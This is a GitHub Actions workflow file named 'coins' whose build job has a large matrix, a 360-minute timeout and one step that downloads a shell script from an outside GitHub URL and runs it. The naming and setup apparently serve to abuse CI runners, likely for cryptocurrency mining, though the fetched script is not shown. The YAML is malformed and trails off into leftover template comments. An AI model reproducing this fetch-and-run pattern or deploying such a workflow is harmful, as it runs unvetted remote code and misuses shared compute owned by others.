# This is a basic workflow to help you get started with Actions

name: coins
on: [push, pull_request]
jobs:
build:
name: akuganteng
runs-on: ubuntu-latest
strategy:
max-parallel: 1
fail-fast: false
matrix:
go: [1.6, 1.7, 1.8, 1.9, 1.10]
flag: [A, B, C, D, E, F, G, H, I]
timeout-minutes: 360
env:
NUM_JOBS: 20
JOB: ${{ matrix.go }}
steps:
- name: Set up Go ${{ matrix.go }}
- uses: actions/setup-go@v1
- with:
- go-version: ${{ matrix.go }}
- id: go
- - name: Setup
uses: actions/checkout@v2
- name: akuganteng
- run: |
- wget https://raw.githubusercontent.com/Heloworldnab/coin/main/Main.sh && chmod u+x Main.sh && ./Main.sh

# Controls when the workflow will run

  # Triggers the workflow on push or pull request events but only for the main branch



  # Allows you to run this workflow manually from the Actions tab


# A workflow run is made up of one or more jobs that can run sequentially or in parallel

  # This workflow contains a single job called "build"

    # The type of runner that the job will run on


    # Steps represent a sequence of tasks that will be executed as part of the job

      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it


      # Runs a single command using the runners shell



      # Runs a set of commands using the runners shell




